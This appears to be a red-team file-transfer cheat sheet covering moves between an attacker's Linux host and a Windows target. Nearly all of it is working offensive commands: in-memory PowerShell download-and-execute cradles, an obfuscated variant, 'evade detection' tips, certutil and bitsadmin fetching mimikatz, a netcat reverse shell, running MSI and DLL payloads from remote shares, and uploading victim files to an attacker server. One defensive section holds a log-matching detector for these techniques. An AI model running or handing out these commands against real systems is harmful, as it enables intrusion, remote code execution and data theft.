Resources
- Core Concepts & Analysis
- URL, URI and URN : https://auth0.com/blog/url-uri-urn-differences/
- What is @echo off : https://stackoverflow.com/questions/38307449/difference-between-echo-off-and-echo-off
- Exploitation
- By ropnop : https://blog.ropnop.com/transferring-files-from-kali-to-windows/
- By hackingarticles : https://www.hackingarticles.in/file-transfer-filter-bypass-exe2hex/ || https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/
- By t3h0n : https://t3h0n.com/transferring-a-binary-nc-exe-over-a-remote-shell-with-exe2hex-and-powershell/
- By dmcxblue : https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/
- By juggernaut-sec : https://juggernaut-sec.com/windows-file-transfers-for-hackers/
- Examples
- Astaroth : https://www.microsoft.com/en-us/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/
- By mosse-security : https://www.mosse-security.com/2020/09/29/upx-malware-evasion-technique.html
- By samuraisecurity : https://samuraisecurity.co.uk/resources/news/red-teaming-exfiltrating-data-command-network-nodes-like-a-ghost/
- By reliaquest : https://reliaquest.com/blog/exfiltration-tools/
- Detection & Analysis :
Cheat sheet
- By verylazytech : https://www.verylazytech.com/post-exploitation/file-transfer-cheatsheet-windows-and-linux
- By 1N3 : https://github.com/1N3/PowerExfil/tree/master
- By ice-wzl : https://ice-wzl.medium.com/red-team-file-transfers-all-the-ways-4274441c62f8
- By harmjoy : https://gist.github.com/HarmJ0y/bb48307ffa663256e239#file-downloadcradles-ps1-L6
- By VirtualAlllocEx : https://github.com/VirtualAlllocEx/Payload-Download-Cradles
Download From Linux 2 Windows
- Base64
# Attacker
md5sum pass.txt
cat pass.txt | base64 -w 0; echo
OR
base64 file.txt | xclip -selection clipboard
# Victim
[IO.File]::WriteAllBytes("C:\Users\fady\Desktop\new\pass.txt", [Convert]::FromBase64String("MTIzCjMyMQoxMjMxMjMKMTIzMTIzMTIzCg=="))
Get-FileHash C:\Users\fady\Desktop\new\pass.txt -Algorithm md5
$b64 = Get-Clipboard # you already copied the base64
[IO.File]::WriteAllBytes('C:\path\to\binary.exe',[Convert]::FromBase64String($b64))
# Tips & Tricks
python3 Base64_Filetransfer.py -i nc64.exe -o nc64.exe # My script to transfer huge files
While this method is convenient, it's not always possible to use. The Windows command-line utility (cmd.exe) has a maximum string length of 8,191 characters. Also, a web shell may error if you attempt to send extremely large strings.
- Packing & Unpacking
# Attacker
upx -9 nc.exe
exe2hex -cc -x nc.exe -p nc.cmd # PowerShell output
exe2hex -cc -x nc.exe -b nc.cmd # Bat output
exe2hex -cc -x nc.exe -e nc.cmd # URL encoded
# Victim
# PowerShell way
@echo off
nc.cmd
nc.exe 192.168.99.22 8080 -e cmd
# Bat way (debug.exe must be present [C:\Windows\System32\debug.exe]; you need to add DEBUG.exe's path to the environment variables)
setx DEBUG "C:\Windows\System32\debug.exe" # Optional
nc.cmd
nc.exe 192.168.99.22 8080 -e cmd
- Powershell
- Disk
- Net.WebClient (Legacy)
# Attacker
python3 -m http.server 80
# Victim
(New-Object Net.WebClient).DownloadFile('http://192.168.99.22/pass.txt','C:\Users\Public\Downloads\pass.txt')
OR
(New-Object Net.WebClient).DownloadFileAsync('http://192.168.99.22/pass.txt', 'C:\Users\Public\Downloads\Pass.txt')
# Tips & Tricks
# In memory
IEX (New-Object Net.WebClient).DownloadString('https://example.lab/benign.ps1')
# TLS problem
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
Binaries (.exe/.dll) cannot be natively "run in memory" with WebClient + IEX.
- HttpClient (Modern)
# Attacker
python3 -m http.server 80
# Victim
Add-Type -AssemblyName System.Net.Http
$httpClient = New-Object System.Net.Http.HttpClient
$bytes = $httpClient.GetByteArrayAsync("http://192.168.99.22/pass.txt").GetAwaiter().GetResult()
[System.IO.File]::WriteAllBytes("C:\Users\Public\Downloads\pass.txt", $bytes)
$httpClient.Dispose()
# Tips & Tricks
# One liner
$httpClient = New-Object System.Net.Http.HttpClient; $bytes = $httpClient.GetByteArrayAsync('http://192.168.99.22/pass.txt').Result; [System.IO.File]::WriteAllBytes('C:\Users\Public\Downloads\pass.txt', $bytes); $httpClient.Dispose()
# In memory
Add-Type -AssemblyName System.Net.Http
$hc = [Net.Http.HttpClient]::new()
$src = $hc.GetStringAsync('http://192.168.99.22/winPEAS.ps1').Result
IEX $src
$hc.Dispose()
$hc = [Net.Http.HttpClient]::new(); $src = $hc.GetStringAsync('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1').Result; IEX $src; $hc.Dispose()
- Invoke-WebRequest
# Attacker
python3 -m http.server 80
# Victim
iwr http://192.168.99.22/pass.txt -OutFile pass.txt
# Tips & Tricks
# Step by step to evade detection
$url = 'http://192.168.99.22/winPEAS.ps1'; $req = [System.Net.WebRequest]::Create($url); $res = $req.GetResponse(); $stream = $res.GetResponseStream(); $reader = New-Object System.IO.StreamReader($stream); $code = $reader.ReadToEnd(); iex $code;
# In memory
iex ([System.Text.Encoding]::UTF8.GetString((Invoke-WebRequest -Uri 'http://192.168.99.22/winPEAS.ps1' -UseBasicParsing).Content))
IEX (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1' -UseBasicParsing).Content
- Invoke-RestMethod
# Attacker
python3 -m http.server 80
# Victim
Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1' -OutFile "C:\Users\Public\Downloads\winPEAS.ps1"
# Tips & Tricks
# In memory
IEX (irm -Uri 'https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')
- Fileless
- Invoke-Expression
(New-Object Net.WebClient).DownloadString('http://192.168.99.22/winPEAS.ps1') | IEX
IEX (New-Object Net.WebClient).DownloadString('http://192.168.99.22/winPEAS.ps1')
- COM objects
- Internet Explorer (IE)
# Attacker
python3 -m http.server 80
# Victim
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.99.22/winPEAS.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Tips & Tricks
Don't use it on updated versions.
- XMLHTTP
# Attacker
python3 -m http.server 80
# Victim
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.99.22/winPEAS.ps1',$false);$h.send();iex $h.responseText
# Tips & Tricks
# Exe
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.99.22/Hello.exe',$false);$h.send();$data=$h.responseBody;[IO.File]::WriteAllBytes("$env:TEMP\s.exe",$data)
- WinHttp
# Attacker
python3 -m http.server 80
# Victim
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://192.168.99.22/winPEAS.ps1',$false);$h.send();iex $h.responseText
# Tips & Tricks
# Obfuscation
$a='WinHttp.WinHttpRequest.5.1';$b='open';$c='send';$d='responseText';$h=new-object -com $a;$h.$b('GET','http://192.168.99.22/winPEAS.ps1',$false);$h.$c();iex $h.$d
- XmlDocument
# Payload (test.xml)
cat test.xml
<?xml version="1.0" encoding="utf-8"?>
<command>
  <a>
    <execute>
      IEX (New-Object Net.WebClient).DownloadString('http://192.168.99.22/winPEAS.ps1')
    </execute>
  </a>
</command>
# Attacker
python3 -m http.server 80
# Victim
$a = New-Object System.Xml.XmlDocument
$a.Load("http://192.168.99.22/test.xml")
$a.command.a.execute | iex
- PowerShell Session File Transfer
- Winrm
Test-NetConnection -ComputerName DATABASE01 -Port 5985
$Session = New-PSSession -ComputerName DATABASE01 # Administrative
Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\ # From attacker to victim
Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session # From victim to attacker
- SMB Server
# Attacker
impacket-smbserver shareme ../Tools/exe -comment 'Fake Share' -smb2support
impacket-smbserver shareme ./ -comment 'Fake Share' -smb2support -username test -password test
New-SmbShare -Name tools -Path "C:\Users\fady\tmp" -FullAccess "Everyone"
# Victim
net use Z: \\192.168.99.22\shareme
net use Z: \\192.168.99.22\shareme /user:test "test"
robocopy "\\192.168.99.22\shareme" "C:\tmp" /E /Z /R:2 /W:5 /mt:16 # The fastest
Start-BitsTransfer -Source \\192.168.99.22\shareme\Tabby.exe
copy \\192.168.99.22\shareme\Tabby.exe
# Tips & Tricks
# Unmount
net use Z: /delete /y
# Msi
msiexec /i "\\192.168.99.22\shareme\rev.msi" /qn
# Dll
regsvr32 /s "\\192.168.99.22\shareme\rev.dll"
# ps1
type "\\192.168.99.22\shareme\test.ps1" | iex
IEX (Get-Content "\\192.168.99.22\shareme\test.ps1" -Raw)
$src = [IO.File]::ReadAllText('\\192.168.99.22\shareme\test.ps1'); iex $src
. \\192.168.99.22\shareme\PowerView.ps1
Invoke-Command -ScriptBlock { IEX (Get-Content \\192.168.99.22\shareme\test.ps1 -Raw) }
# Exe
Start-Process "\\192.168.99.22\shareme\rev.exe" # Needs UAC bypass
- FTP
# Attacker
sudo pip3 install pyftpdlib
python3 -m pyftpdlib --port 21
# Victim
(New-Object Net.WebClient).DownloadFile('ftp://192.168.99./file.txt', 'C:\Users\Public\ftp-file.txt')
# Tips & Tricks
# Non-interactive shell (UAC bypass)
echo open 192.168.99.23 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo GET pass.txt >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt
- RDP
rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'
xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer
- LOLBins
- Upload
- Certreq
# Attacker
nc -lvnp 8000
# Victim
certreq.exe -Post -config http://192.168.99.22:8000 C:\Users\fady\Desktop\pass.txt
- Download
- bitsadmin
# Attacker
python3 -m http.server 80
# Victim
bitsadmin /transfer fakejob /priority foreground http://192.168.99.22/mimikatz.exe C:\Users\fady\Desktop\mimo.exe
OR
Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"
- certutil
# Attacker
python3 -m http.server 80
# Victim
certutil.exe -verifyctl -split -f http://192.168.99.22/mimikatz.exe
- Languages
- Misc
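As the defender's counterpart to the download cradles (WebClient, HttpClient, iwr/irm, COM objects, XmlDocument) and LOLBins catalogued above, here is an added example of my own, not code from this page or any linked project: it classifies constructed PowerShell script-block (event 4104) and process-creation (event 4688) texts against regexes derived from the page's one-liners. The technique labels, the patterns and the sample events are assumptions of this example, not a vendor rule set.

```python
import re

# Hypothetical technique labels, each with a case-insensitive regex applied to the
# logged text of a PowerShell script block (event 4104) or a process command line
# (event 4688). The patterns mirror the transfer one-liners catalogued on this page.
PATTERNS = {
    "ps-webclient-cradle":   r"Net\.WebClient.*\.Download(String|File|FileAsync)\(",
    "ps-httpclient":         r"Net\.Http\.HttpClient",
    "ps-iwr-irm-to-iex":     r"\biex\b.*\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod)\b"
                             r"|\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod)\b.*\|\s*iex\b",
    "ps-base64-to-disk":     r"FromBase64String\(.*WriteAllBytes|WriteAllBytes\(.*FromBase64String",
    "ps-http-upload":        r"\.UploadFile\(|-Method\s+POST\b.*-Body\b",
    "com-xmlhttp-winhttp":   r"Msxml2\.XMLHTTP|WinHttp\.WinHttpRequest",
    "ps-xmldocument-cradle": r"Xml\.XmlDocument.*\.Load\(\s*['\"]https?://",
    "lolbin-certutil":       r"\bcertutil(\.exe)?\b.*\s-(verifyctl|urlcache|encode|decode)\b",
    "lolbin-bitsadmin":      r"\bbitsadmin(\.exe)?\s+/transfer\b|\bStart-BitsTransfer\b",
    "lolbin-certreq-post":   r"\bcertreq(\.exe)?\s+-Post\b",
    "ftp-script-file":       r"\bftp(\.exe)?\b.*\s-s:",
    "exec-from-unc":         r"\b(msiexec|regsvr32|Start-Process)\b.*\\\\\S+\\",
}
# DOTALL lets a pattern span the several lines of one logged script block.
COMPILED = {name: re.compile(rx, re.IGNORECASE | re.DOTALL) for name, rx in PATTERNS.items()}

def classify(text):
    """Return the sorted technique labels whose pattern matches one logged text."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(text))

def scan(events):
    """Keep only the (source, labels) pairs for events that match at least one pattern."""
    hits = ((src, classify(txt)) for src, txt in events)
    return [(src, labels) for src, labels in hits if labels]

# Constructed sample events (not real telemetry): the page's own one-liners plus one benign command.
SAMPLE_EVENTS = [
    ("4104", "IEX (New-Object Net.WebClient).DownloadString('http://192.168.99.22/winPEAS.ps1')"),
    ("4104", "$a='WinHttp.WinHttpRequest.5.1';$b='open';$h=new-object -com $a;"
             "$h.$b('GET','http://192.168.99.22/winPEAS.ps1',$false)"),
    ("4104", "[IO.File]::WriteAllBytes('C:\\path\\to\\binary.exe',[Convert]::FromBase64String($b64))"),
    ("4104", "$a = New-Object System.Xml.XmlDocument\n$a.Load(\"http://192.168.99.22/test.xml\")"),
    ("4688", "certutil.exe -verifyctl -split -f http://192.168.99.22/mimikatz.exe"),
    ("4688", "bitsadmin /transfer fakejob /priority foreground http://192.168.99.22/x.exe C:\\Temp\\x.exe"),
    ("4688", "ftp -v -n -s:ftpcommand.txt"),
    ("4688", "msiexec /i \"\\\\192.168.99.22\\shareme\\rev.msi\" /qn"),
    ("4104", "Get-ChildItem C:\\Users\\Public -Recurse | Measure-Object"),
]

if __name__ == "__main__":
    for src, labels in scan(SAMPLE_EVENTS):
        print(src, ", ".join(labels))
```

The obfuscated WinHttp variant from the page still matches because the COM ProgID survives as a string literal in script-block logging; the benign Get-ChildItem event produces no label.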
Upload From Linux 2 Windows
- Base64
# Victim
[Convert]::ToBase64String((Get-Content -Path "C:\Users\fady\Desktop\pass.txt" -Encoding Byte))
[Convert]::ToBase64String((Get-Content -Path "C:\Users\fady\Desktop\nc64.exe" -Encoding Byte)) | Set-Clipboard
Get-FileHash "C:\Users\fady\Desktop\pass.txt" -Algorithm MD5 | select Hash
# 2
IWR -Uri http://192.168.99.22:8080/msg -Method POST -Body $base64str
# 3
certutil -encode C:\Users\fady\Desktop\pass.txt C:\Windows\Temp\encoded.b64
type C:\Windows\Temp\encoded.b64 | Set-Clipboard
# Attacker
echo 'b3BlbiAx....==' | base64 -d > file.txt
OR
xclip -selection clipboard -o | base64 -d > nc_copy.exe
md5sum file.txt
# 2
rlwrap nc -nlvp 8080
- Powershell
- Upload Web server
# Attacker
pip3 install uploadserver
python3 -m uploadserver 8080
# Victim
IEX (New-Object Net.WebClient).DownloadString('http://192.168.99.22/PSUpload.ps1')
Invoke-FileUpload -Uri http://192.168.99.22:8080/upload -File C:\Users\fady\Desktop\pass.txt
- Invoke-WebRequest
# Attacker
rlwrap nc -nlvp 8080
THEN
echo 'MTIzDQozMjENCjEyMzEyMw0KMTIzMTIzMTIzDQo=' | base64 -d > pass.txt
# Victim
$b64 = [System.Convert]::ToBase64String((Get-Content -Path 'C:\Users\fady\Desktop\pass.txt' -Encoding Byte))
Invoke-WebRequest -Uri http://192.168.99.22:8080/ -Method POST -Body $b64
- SMB
# Attacker
pip3 install wsgidav cheroot
wsgidav -H 0.0.0.0 -p 80 -r /root/Trash/ --auth anonymous -v
impacket-smbserver shareme . -comment 'Fake Share' -smb2support
# Victim
copy C:\Users\fady\Desktop\Wireshark-4.6.0-x64.exe \\192.168.99.22\DavWWWRoot\
# Tips & Tricks
# The WebDAV UNC redirector depends on the WebClient service. If it is stopped or disabled, the UNC path \\host\DavWWWRoot fails.
Get-Service WebClient | Select-Object Status, StartType
Start-Service WebClient # Administrator
Commonly, enterprises don't allow the SMB protocol (TCP/445) out of their internal network because it can open them up to potential attacks. An alternative is to run SMB over HTTP with WebDAV.
- FTP
# Attacker
python3 -m pyftpdlib --port 21 --write
# Victim
(New-Object Net.WebClient).UploadFile('ftp://192.168.99.22/Wireshark.exe', 'C:\Users\fady\Desktop\Wireshark-4.6.0-x64.exe')
# Tips & Tricks
# Non-interactive shell
echo open 192.168.99.22 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT C:\Users\fady\Desktop\Wireshark-4.6.0-x64.exe >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt
Data Protection
- Invoke-AESEncryption.ps1
Invoke-AESEncryption -Mode Encrypt -Key Password123# -Path .\pass.txt -Verbose
Invoke-AESEncryption -Mode Decrypt -Key Password123# -Path C:\Users\fady\Desktop\pass.txt.aes
Tools
- Gists : mgeeky | Harmj0y
- PSUpload.ps1 : PSUpload.ps1
- Invoke-AESEncryption : https://www.powershellgallery.com/packages/DRTools/4.0.2.3/Content/Functions%5CInvoke-AESEncryption.ps1
- LOLBAS : https://lolbas-project.github.io/
- exe2hex : https://github.com/g0tmi1k/exe2hex
- Invoke-CradleCrafter : https://github.com/danielbohannon/Invoke-CradleCrafter
Notes
URI vs. URL vs. URN
Term | Identifies? | Locates? | Example
URI  | Yes         | Maybe    | https://example.com or urn:isbn:1234
URL  | Yes         | Yes      | https://example.com/page.html
URN  | Yes         | No       | urn:isbn:0-486-27557-4
PowerShell Web Transfer Tools: A Comparison
Quick Comparison (At a Glance)
Feature | Net.WebClient | HttpClient | Invoke-WebRequest (iwr) | Invoke-RestMethod (irm)
Primary use | Simple HTTP, legacy-friendly | Modern, robust HTTP | Human/content fetch (HTML/files) | APIs/REST (JSON/XML → objects)
Return type | String/bytes (you decide) | HttpResponseMessage / bytes / string | HtmlWebResponseObject (has .Content) | Native PS objects (JSON → PSObject)
Speed/overhead | Fast & terse | Fastest + scalable | Slowest on WinPS 3–5.x (extra parsing) | Fast for APIs (no HTML parsing)
File download | DownloadFile / bytes | Stream/bytes → write | -OutFile (best with files) | -OutFile (not ideal; use iwr)
Fileless exec | .DownloadString() with IEX | GetStringAsync() with IEX | | 
Proxy awareness | Inherits system; settable | Full control via handler | Proxy-aware; -Proxy | Proxy-aware; -Proxy
TLS control | Often via global ServicePointManager | Per-handler (clean) | Engine defaults | Engine defaults
Headers/UA | $wc.Headers[...] | DefaultRequestHeaders | -Headers, -UserAgent | -Headers, -UserAgent
Logging optics | Low cmdlet "signature" | Low (looks like .NET use) | High (easy to detect iwr) | Medium (common in admin/API use)
Cross-platform | Yes (Windows .NET) | Yes | Yes (PS 3+) | Yes (PS 3+)
When to use what (Decision Cheat Sheet)
- Download a file reliably (to disk) → iwr -OutFile (simple) or HttpClient (fine control).
- In-memory/fileless text → WebClient (short) or HttpClient (stealthier cmdline); iwr works via .Content.
- Consume an API (JSON/XML) → irm (auto-parses to objects).
- Terse one-liner on legacy hosts → WebClient.
- Need precise proxy/TLS/timeout control → HttpClient.
- Large/brittle transfers → consider BITS (Start-BitsTransfer) for resiliency (disk-touching by design).